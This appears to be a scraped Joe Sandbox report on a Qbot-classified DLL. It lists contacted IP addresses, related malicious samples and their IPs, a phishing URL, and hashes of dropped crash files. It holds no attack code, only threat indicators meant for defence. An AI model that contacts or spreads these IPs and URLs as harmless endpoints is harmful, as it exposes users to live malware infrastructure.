                                                                                    3215FranceTelecom-OrangeFRtrue
                                                                                    174.58.146.57
                                                                                    unknownUnited States
                                                                                    7922COMCAST-7922UStrue
                                                                                    223.166.13.95
                                                                                    unknownChina
                                                                                    17621CNCGROUP-SHChinaUnicomShanghainetworkCNtrue
                                                                                    5.192.141.228
                                                                                    unknownUnited Arab Emirates
                                                                                    5384EMIRATES-INTERNETEmiratesInternetAEtrue
                                                                                    65.95.141.84
                                                                                    unknownCanada
                                                                                    577BACOMCAtrue
                                                                                    75.98.154.19
                                                                                    unknownUnited States
                                                                                    32444SAFELINK-MVUStrue
                                                                                    77.126.99.230
                                                                                    unknownIsrael
                                                                                    9116GOLDENLINES-ASNPartnerCommunicationsMainAutonomousSystetrue
                                                                                    103.123.223.133
                                                                                    unknownIndia
                                                                                    138329KWS-AS-APKenstarWebSolutionsPrivateLimitedINtrue
                                                                                    74.12.147.139
                                                                                    unknownCanada
                                                                                    577BACOMCAtrue
                                                                                    74.6.143.25
                                                                                    yahoo.comUnited States
                                                                                    26101YAHOO-3USfalse
                                                                                    92.9.45.20
                                                                                    unknownUnited Kingdom
                                                                                    13285OPALTELECOM-ASTalkTalkCommunicationsLimitedGBtrue
                                                                                    113.11.92.30
                                                                                    unknownBangladesh
                                                                                    7565BDCOM-BDRangsNiluSquare5thFloorHouse75Road5ADtrue
                                                                                    77.86.98.236
                                                                                    unknownUnited Kingdom
                                                                                    12390KINGSTON-UK-ASGBtrue
                                                                                    103.140.174.20
                                                                                    unknownIndia
                                                                                    138763PRAVEEN1-ASPraveenTelecomPvtLtdINtrue
                                                                                    IP
                                                                                    192.168.2.1
                                                                                    Joe Sandbox Version:37.1.0 Beryl
                                                                                    Analysis ID:880549
                                                                                    Start date and time:2023-06-02 13:09:09 +02:00
                                                                                    Joe Sandbox Product:CloudBasic
                                                                                    Overall analysis duration:0h 11m 45s
                                                                                    Hypervisor based Inspection enabled:false
                                                                                    Report type:full
                                                                                    Cookbook file name:default.jbs
                                                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                    Number of analysed new started processes analysed:24
                                                                                    Number of new started drivers analysed:0
                                                                                    Number of existing processes analysed:0
                                                                                    Number of existing drivers analysed:0
                                                                                    Number of injected processes analysed:0
                                                                                    Technologies:
                                                                                    • HCA enabled
                                                                                    • EGA enabled
                                                                                    • HDC enabled
                                                                                    • AMSI enabled
                                                                                    Analysis Mode:default
                                                                                    Analysis stop reason:Timeout
                                                                                    Sample file name:distantly.dat.dll
                                                                                    Detection:MAL
                                                                                    Classification:mal100.troj.evad.winDLL@30/19@2/100
                                                                                    EGA Information:
                                                                                    • Successful, ratio: 50%
                                                                                    HDC Information:
                                                                                    • Successful, ratio: 27.4% (good quality ratio 26.1%)
                                                                                    • Quality average: 78.3%
                                                                                    • Quality standard deviation: 25.4%
                                                                                    HCA Information:
                                                                                    • Successful, ratio: 100%
                                                                                    • Number of executed functions: 23
                                                                                    • Number of non-executed functions: 44
                                                                                    Cookbook Comments:
                                                                                    • Found application associated with file extension: .dll
                                                                                    • Override analysis time to 240s for rundll32
                                                                                    • Exclude process from analysis (whitelisted): audiodg.exe, WerFault.exe, svchost.exe
                                                                                    • Excluded IPs from analysis (whitelisted): 20.189.173.20, 52.168.117.173
                                                                                    • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, watson.telemetry.microsoft.com
                                                                                    • Execution Graph export aborted for target rundll32.exe, PID 7080 because there are no executed function
                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                    TimeTypeDescription
                                                                                    13:10:15API Interceptor4x Sleep call for process: WerFault.exe modified
                                                                                    13:10:17API Interceptor1x Sleep call for process: loaddll32.exe modified
                                                                                    13:10:27API Interceptor9x Sleep call for process: wermgr.exe modified
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    2.82.8.80qbot1.dllGet hashmaliciousQbotBrowse
                                                                                      oOo.dat.dllGet hashmaliciousQbotBrowse
                                                                                        photographed.dat.dllGet hashmaliciousQbotBrowse
                                                                                          F086.dllGet hashmaliciousQbotBrowse
                                                                                            A649.dllGet hashmaliciousQbotBrowse
                                                                                              F072.dllGet hashmaliciousQbotBrowse
                                                                                                F086.dllGet hashmaliciousQbotBrowse
                                                                                                  A290.dllGet hashmaliciousQbotBrowse
                                                                                                    A649.dllGet hashmaliciousQbotBrowse
                                                                                                      5q4psw.msiGet hashmaliciousQbotBrowse
                                                                                                        15dasx.msiGet hashmaliciousQbotBrowse
                                                                                                          5q4psw.msiGet hashmaliciousQbotBrowse
                                                                                                            15dasx.msiGet hashmaliciousQbotBrowse
                                                                                                              licking.dllGet hashmaliciousQbotBrowse
                                                                                                                licking.dllGet hashmaliciousQbotBrowse
                                                                                                                  main2.dllGet hashmaliciousQbotBrowse
                                                                                                                    r3zg12.msiGet hashmaliciousQbotBrowse
                                                                                                                      main.dllGet hashmaliciousQbotBrowse
                                                                                                                        r3zg12.msiGet hashmaliciousQbotBrowse
                                                                                                                          main.dllGet hashmaliciousQbotBrowse
                                                                                                                            70.160.67.203qbot1.dllGet hashmaliciousQbotBrowse
                                                                                                                              oOo.dat.dllGet hashmaliciousQbotBrowse
                                                                                                                                photographed.dat.dllGet hashmaliciousQbotBrowse
                                                                                                                                  F086.dllGet hashmaliciousQbotBrowse
                                                                                                                                    A649.dllGet hashmaliciousQbotBrowse
                                                                                                                                      F072.dllGet hashmaliciousQbotBrowse
                                                                                                                                        F086.dllGet hashmaliciousQbotBrowse
                                                                                                                                          A290.dllGet hashmaliciousQbotBrowse
                                                                                                                                            A649.dllGet hashmaliciousQbotBrowse
                                                                                                                                              5q4psw.msiGet hashmaliciousQbotBrowse
                                                                                                                                                15dasx.msiGet hashmaliciousQbotBrowse
                                                                                                                                                  5q4psw.msiGet hashmaliciousQbotBrowse
                                                                                                                                                    15dasx.msiGet hashmaliciousQbotBrowse
                                                                                                                                                      licking.dllGet hashmaliciousQbotBrowse
                                                                                                                                                        licking.dllGet hashmaliciousQbotBrowse
                                                                                                                                                          main2.dllGet hashmaliciousQbotBrowse
                                                                                                                                                            r3zg12.msiGet hashmaliciousQbotBrowse
                                                                                                                                                              main.dllGet hashmaliciousQbotBrowse
                                                                                                                                                                r3zg12.msiGet hashmaliciousQbotBrowse
                                                                                                                                                                  main.dllGet hashmaliciousQbotBrowse
                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                    new-fp-shed.wg1.b.yahoo.comqbot1.dllGet hashmaliciousQbotBrowse
                                                                                                                                                                    • 87.248.100.215
                                                                                                                                                                    A290.dllGet hashmaliciousQbotBrowse
                                                                                                                                                                    • 87.248.100.215
                                                                                                                                                                    main2.dllGet hashmaliciousQbotBrowse
                                                                                                                                                                    • 87.248.100.215
                                                                                                                                                                    http://fotnet24.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 87.248.100.215
                                                                                                                                                                    05642199.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                    • 87.248.100.216
                                                                                                                                                                    PXNuYAPR.dat.dllGet hashmaliciousQbotBrowse
                                                                                                                                                                    • 87.248.100.216
                                                                                                                                                                    TB9mkKe4Qzu.dat.dllGet hashmaliciousQbotBrowse
                                                                                                                                                                    • 87.248.100.216
                                                                                                                                                                    a0UFMZnC6ltxphw.dat.dllGet hashmaliciousQbotBrowse
                                                                                                                                                                    • 87.248.100.215
                                                                                                                                                                    Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 87.248.100.215
                                                                                                                                                                    Hlyl.jsGet hashmaliciousQbotBrowse
                                                                                                                                                                    • 87.248.100.215
                                                                                                                                                                    vundevjtbot.bin.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 87.248.100.216
                                                                                                                                                                    E5DpWZ7Yhr.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 87.248.100.215
                                                                                                                                                                    https://utfgsds.ezua.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 87.248.100.216
                                                                                                                                                                    https://fqwfwqnk3.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 87.248.100.215
                                                                                                                                                                    7RD77UG8TYw7RQtHA1m6jgB5yClv1L9xa3iK8.wsfGet hashmaliciousQbotBrowse
                                                                                                                                                                    • 87.248.100.215
                                                                                                                                                                    http://www.landscapingideas.za.com/2m11863sg171e5597lo10782gr14347jv282t264772k3323440420.phpGet hashmaliciousReCaptcha PhishBrowse
                                                                                                                                                                    • 87.248.100.215
                                                                                                                                                                    peenge.dllGet hashmaliciousQbotBrowse
                                                                                                                                                                    • 87.248.100.216
                                                                                                                                                                    neoplasmsFormazan.dllGet hashmaliciousQbotBrowse
                                                                                                                                                                    • 87.248.100.216
                                                                                                                                                                    qfJZ.jsGet hashmaliciousQbotBrowse
                                                                                                                                                                    • 87.248.100.216
                                                                                                                                                                    Agreement_177360_Mar4.dllGet hashmaliciousQbotBrowse
                                                                                                                                                                    • 87.248.100.215
                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                    MEO-RESIDENCIALPTqbot1.dllGet hashmaliciousQbotBrowse
                                                                                                                                                                    • 2.82.8.80
                                                                                                                                                                    oOo.dat.dllGet hashmaliciousQbotBrowse
                                                                                                                                                                    • 2.82.8.80
                                                                                                                                                                    4FvxWvpyEa.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                    • 85.244.76.113
                                                                                                                                                                    photographed.dat.dllGet hashmaliciousQbotBrowse
                                                                                                                                                                    • 2.82.8.80
                                                                                                                                                                    db0fa4b8db0333367e9bda3ab68b8042.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                    • 2.80.41.222
                                                                                                                                                                    F086.dllGet hashmaliciousQbotBrowse
                                                                                                                                                                    • 2.82.8.80
                                                                                                                                                                    A649.dllGet hashmaliciousQbotBrowse
                                                                                                                                                                    • 2.82.8.80
                                                                                                                                                                    F072.dllGet hashmaliciousQbotBrowse
                                                                                                                                                                    • 2.82.8.80
                                                                                                                                                                    F086.dllGet hashmaliciousQbotBrowse
                                                                                                                                                                    • 2.82.8.80
                                                                                                                                                                    A290.dllGet hashmaliciousQbotBrowse
                                                                                                                                                                    • 2.82.8.80
                                                                                                                                                                    A649.dllGet hashmaliciousQbotBrowse
                                                                                                                                                                    • 2.82.8.80
                                                                                                                                                                    5q4psw.msiGet hashmaliciousQbotBrowse
                                                                                                                                                                    • 2.82.8.80
                                                                                                                                                                    15dasx.msiGet hashmaliciousQbotBrowse
                                                                                                                                                                    • 2.82.8.80
                                                                                                                                                                    5q4psw.msiGet hashmaliciousQbotBrowse
                                                                                                                                                                    • 2.82.8.80
                                                                                                                                                                    15dasx.msiGet hashmaliciousQbotBrowse
                                                                                                                                                                    • 2.82.8.80
                                                                                                                                                                    licking.dllGet hashmaliciousQbotBrowse
                                                                                                                                                                    • 2.82.8.80
                                                                                                                                                                    licking.dllGet hashmaliciousQbotBrowse
                                                                                                                                                                    • 2.82.8.80
                                                                                                                                                                    main2.dllGet hashmaliciousQbotBrowse
                                                                                                                                                                    • 2.82.8.80
                                                                                                                                                                    r3zg12.msiGet hashmaliciousQbotBrowse
                                                                                                                                                                    • 2.82.8.80
                                                                                                                                                                    main.dllGet hashmaliciousQbotBrowse
                                                                                                                                                                    • 2.82.8.80
                                                                                                                                                                    COGENT-174UScHxf8VLnQk.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                    • 38.51.219.192
                                                                                                                                                                    JUsM9UZd5S.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                    • 66.28.136.31
                                                                                                                                                                    76jchSM1O1.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                    • 38.74.173.179
                                                                                                                                                                    https://www.ancestry.com/rakuten/?url=http%3A%2F%2Flaydiesther.com/b/b/o/bm9ib2R5QG5vd2hlcmUuY29tGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                    • 143.244.145.139
                                                                                                                                                                    nicotine_poison.pdf.exeGet hashmaliciousLodaRATBrowse
                                                                                                                                                                    • 149.50.211.160
                                                                                                                                                                    hkcmd.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                    • 154.23.133.34
                                                                                                                                                                    Cancellation 240958 May 30.jsGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 149.102.225.49
                                                                                                                                                                    gf1IRRLTXK.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                    • 167.160.22.253
                                                                                                                                                                    db0fa4b8db0333367e9bda3ab68b8042.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                    • 130.117.87.161
                                                                                                                                                                    file.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                    • 143.244.162.145
                                                                                                                                                                    decode_aca4b3dbb9a0b1906c0dce0611793cbb0185e1488d3be8dbbeb2675f9e1cdeaa.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                    • 154.12.254.215
                                                                                                                                                                    MrQiZodQux.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                    • 38.7.243.231
                                                                                                                                                                    AEJR1569.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                                                                                    • 143.244.162.145
                                                                                                                                                                    Cancellation_700988_May_30.jsGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 149.102.225.49
                                                                                                                                                                    Cancellation_700988_May_30.jsGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 149.102.225.49
                                                                                                                                                                    IMG-20230529-WA0004470000000000000000002023.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                    • 154.22.208.141
                                                                                                                                                                    UMyY7qXi7b.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                    • 38.193.83.32
                                                                                                                                                                    hwUWc6cDPF.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                    • 38.154.115.118
                                                                                                                                                                    KipHfbWc5u.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                    • 154.55.185.253
                                                                                                                                                                    65cBS6uCoV.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                    • 149.30.158.20
                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                    37f463bf4616ecd445d4a1937da06e19lista_de_cotizaciones_del_catalogo#U00b7pdf.exeGet hashmaliciousGuLoader, LokibotBrowse
                                                                                                                                                                    • 87.248.100.215
                                                                                                                                                                    • 74.6.143.25
                                                                                                                                                                    image3d30ba.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                    • 87.248.100.215
                                                                                                                                                                    • 74.6.143.25
                                                                                                                                                                    INVOICE.213223421.pdf.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                    • 87.248.100.215
                                                                                                                                                                    • 74.6.143.25
                                                                                                                                                                    rDOCUMENTONPURCHASEORDER__pdf.exeGet hashmaliciousGuLoader, LokibotBrowse
                                                                                                                                                                    • 87.248.100.215
                                                                                                                                                                    • 74.6.143.25
                                                                                                                                                                    scan1668.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                                                                                    • 87.248.100.215
                                                                                                                                                                    • 74.6.143.25
                                                                                                                                                                    ORDER-236001.doc.jsGet hashmaliciousWSHRatBrowse
                                                                                                                                                                    • 87.248.100.215
                                                                                                                                                                    • 74.6.143.25
                                                                                                                                                                    ProjectFunding_450726_Jun01.jsGet hashmaliciousQbotBrowse
                                                                                                                                                                    • 87.248.100.215
                                                                                                                                                                    • 74.6.143.25
                                                                                                                                                                    ProjectFunding_450726_Jun01.jsGet hashmaliciousQbotBrowse
                                                                                                                                                                    • 87.248.100.215
                                                                                                                                                                    • 74.6.143.25
                                                                                                                                                                    01559899.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                                                                                    • 87.248.100.215
                                                                                                                                                                    • 74.6.143.25
                                                                                                                                                                    doc1961.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                                                                                    • 87.248.100.215
                                                                                                                                                                    • 74.6.143.25
                                                                                                                                                                    Original_Documents_Shipmen_06012023001.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 87.248.100.215
                                                                                                                                                                    • 74.6.143.25
                                                                                                                                                                    file.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                                                                                    • 87.248.100.215
                                                                                                                                                                    • 74.6.143.25
                                                                                                                                                                    18042023_Sotramac - Modelo Financiero_test.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 87.248.100.215
                                                                                                                                                                    • 74.6.143.25
                                                                                                                                                                    scan1574.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                                                                                    • 87.248.100.215
                                                                                                                                                                    • 74.6.143.25
                                                                                                                                                                    scan214.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                                                                                    • 87.248.100.215
                                                                                                                                                                    • 74.6.143.25
                                                                                                                                                                    scan70.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                                                                                    • 87.248.100.215
                                                                                                                                                                    • 74.6.143.25
                                                                                                                                                                    scan1731.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                                                                                    • 87.248.100.215
                                                                                                                                                                    • 74.6.143.25
                                                                                                                                                                    L8wkOrMOxJr.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                    • 87.248.100.215
                                                                                                                                                                    • 74.6.143.25
                                                                                                                                                                    ZQJUohY1s7.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                                                                                                    • 87.248.100.215
                                                                                                                                                                    • 74.6.143.25
                                                                                                                                                                    ingrid_6_6.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 87.248.100.215
                                                                                                                                                                    • 74.6.143.25
                                                                                                                                                                    No context
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):65536
                                                                                                                                                                    Entropy (8bit):0.9062600022990434
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:IdTi30oXAHBUZMX4jed+Qy/u7sUS274ItWc:gTiJXoBUZMX4jeQ/u7sUX4ItWc
                                                                                                                                                                    MD5:8C5DABD30C6E252C459BE84E82A2FAF0
                                                                                                                                                                    SHA1:76C2E30D647172520C68039C4B3B0AB9BB67A8A4
                                                                                                                                                                    SHA-256:02A4924B9E28045850168F18D8074A42721654476D92626548C2F8ACF6BB4A8A
                                                                                                                                                                    SHA-512:E678FBBDAFB22D179F1463A991B5151959C1CFCF83A251FD85E295B9F288E16216A29794A77B67BB3D949FDAE0B90F076729B3299A601EB2DFD0E74C7BC581CE
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.3.0.1.7.7.8.0.9.3.9.6.4.8.3.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.3.0.1.7.7.8.1.0.3.3.7.1.6.3.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.0.9.2.3.8.e.5.-.2.9.e.9.-.4.4.f.5.-.8.c.4.4.-.9.e.4.9.0.5.6.a.9.6.3.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.d.a.a.8.b.c.0.-.5.1.5.a.-.4.d.b.4.-.a.d.f.a.-.a.6.c.d.1.3.8.b.d.8.1.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.f.4.8.-.0.0.0.1.-.0.0.1.f.-.3.f.6.9.-.4.f.c.a.4.2.9.5.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):65536
                                                                                                                                                                    Entropy (8bit):0.9061789819259586
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:/YeiF0oXIHBUZMX4jed+Qy/u7sUS274ItWc:9iLXwBUZMX4jeQ/u7sUX4ItWc
                                                                                                                                                                    MD5:A8D80DB5179944BAD0E7CFBE72176F0F
                                                                                                                                                                    SHA1:7535BADFC80E5B2D32642BFE75B11E82B7F0B3E1
                                                                                                                                                                    SHA-256:322BC0F9D1F27ADDB7A8F0AEA4DBB8046590F68221BD473BF3D855E919BD5885
                                                                                                                                                                    SHA-512:ABEE2E0921824E2C9FB7F5C7D7029DDA7E5A9679BC79C9BE0542E56A8329E7A2089456B2907423192C69E59424DAFEB24A61651AA036C94ACD5D69F9521F8D81
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.3.0.1.7.7.8.0.9.3.5.7.2.3.9.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.3.0.1.7.7.8.1.0.4.4.5.0.8.8.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.1.b.b.c.c.c.7.-.e.4.4.1.-.4.4.2.1.-.b.3.5.f.-.d.2.6.1.1.c.a.4.3.3.b.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.8.8.7.1.b.4.2.-.0.6.4.a.-.4.7.0.a.-.a.3.9.9.-.9.2.d.f.0.b.3.7.1.4.d.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.a.8.-.0.0.0.1.-.0.0.1.f.-.0.2.c.d.-.4.c.c.a.4.2.9.5.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):65536
                                                                                                                                                                    Entropy (8bit):0.9066453463814037
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:qa4iU0oXrHBUZMX4jed+Qy/u7sUS274ItWcv:J4iiXLBUZMX4jeQ/u7sUX4ItWc
                                                                                                                                                                    MD5:6EFA7341F51E38EE186AEE8DA4C6458C
                                                                                                                                                                    SHA1:EC20E32C97646BC2B11B8514CA93B96F50B6E493
                                                                                                                                                                    SHA-256:0C381E791DB8BF3EBE4D6B273231D9EACA29617A0913AED73C8E941660F5006C
                                                                                                                                                                    SHA-512:48C4DE628F26C4145876EB19A387BE58C50A5559A479BF8F963C606D30865F19D3BD27E12C54BADD0B66B04C99567359779DC18A6ED9BEB8CB88C4F5AE288383
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.3.0.1.7.7.8.1.7.8.5.9.8.7.7.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.3.0.1.7.7.8.1.8.7.6.6.1.1.5.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.0.d.6.f.a.6.a.-.a.f.7.7.-.4.0.f.8.-.9.1.3.e.-.9.3.f.0.7.5.9.7.6.5.8.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.4.7.e.0.7.5.9.-.a.d.0.3.-.4.6.d.0.-.a.9.2.b.-.b.a.e.2.d.7.1.e.6.f.5.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.7.0.-.0.0.0.1.-.0.0.1.f.-.a.1.f.5.-.c.3.c.f.4.2.9.5.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):65536
                                                                                                                                                                    Entropy (8bit):0.9064979275908839
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:GUQig0oX2HBUZMX4jed+Qy/u7sUS274ItWc:8i2XuBUZMX4jeQ/u7sUX4ItWc
                                                                                                                                                                    MD5:255EBAC7362AA93039554D012EBA70EF
                                                                                                                                                                    SHA1:D9B612FF26C7F90DC79968421337ABF57D0A24AF
                                                                                                                                                                    SHA-256:FB30822DAA6C35C34A46C69AD84366CB049FCB2CB195F87505747218DA1228F8
                                                                                                                                                                    SHA-512:BF634AC765E55D14599345387D315714DFBEFB72F96D199EC3D0EED5575CFE84B1D480D207AFD87067A68B81B4B55E8E2A7AE59AB7FE06CECEB742E3E4730729
                                                                                                                                                                    Malicious:false
